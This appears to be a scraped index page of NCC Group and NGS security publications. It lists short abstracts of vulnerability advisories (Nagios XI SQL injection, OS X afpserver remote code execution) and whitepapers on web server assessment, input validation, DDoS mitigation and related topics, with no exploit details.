Summary Name: Nagios XI Network Monitor – Blind SQL InjectionRelease Date: 30 November 2012Reference: NGS00194Discoverer: Daniel Compton <daniel.compton@ngssecure.com>Vendor: NagiosVendor Reference: 0000282Systems Affected: Nagios XI Network Monitor 2011R1.9Risk: HighStatus: Published TimeLine Discovered: 30 January 2012Released: 31 January 2012Approved: 31 January 2012Reported: 31 January 2012Fixed:  7 June 2012Published: 30 November 2012 Description…

A good application security assessment should probe all levels of the environment as well as the custom application itself. In this paper we will examine the relatively unknown skills of assessing the in-depth configuration of a Microsoft IIS web server remotely, and we hope that we will also show the…

Input validation is the process of ensuring the input into software conforms to what the internal logic of the software expects, though it is a relatively simple problem to solve it accounts for a high proportion of security vulnerabilities discovered. Not only is more education needed on the security risks…

DDoS attacks have been on the up for a number of years which has resulted in significant increases in the variety and availability of mitigation services designed to deal with such threats. With advancements in attack techniques comes the requirement for mitigation providers to adapt detection and scrubbing methodologies. We…

Web-based applications’ authentication processes are commonly vulnerable to automated brute force guessing attacks. Techniques such as escalating time delays and minimum lockout strategies are commonly implemented to solve the problem however in reality these techniques are not effective. This paper will explore an alternative solution, the enforcement of resource metering…

This paper, by David Litchfield, will be exploring the introduction to heap overflows on AIX 5.3L.  Download whitepaper

Geofencing is the use of the global positioning system (GPS) to create a ‘virtual barrier’, enabling different functionality in an application or device depending on geographical area. In particular, many applications now exist to allow users to receive alerts should a mobile device leave or join a specified area. These…

Oops you’ve come to this page in error You are not authorised to access the document you have requested

The intricate relationship between an organisation and its suppliers as they share information and access to business systems comes at a cost. In order to ensure the security and integrity of their suppliers, many organisations rely heavily upon a number of internal verification and audit processes that are expensive and…

NCC Group believes that security research is performed to keep the users of technology safe from its weaknesses and informed of the risks they are taking through its use. Download the disclosure policy

Vulnerability Summary Title OSX afpserver remote code executionRelease Date 2 July 2015Reference NCC00836Discoverer Dean JerkovichVendor AppleVendor Reference 2015-005Systems Affected OS X YosemiteCVE Reference CVE-2015-3674Risk HighStatus Published Download technical advisory

Andy Davis, NCC Group’s Research Director presented Fuzzing the Easy Way Using Zulu at the 2014 Nullcon conference in Goa, India. The presentation describes how Zulu has been successfully used to discover high profile bugs and details the motivations for developing the tool.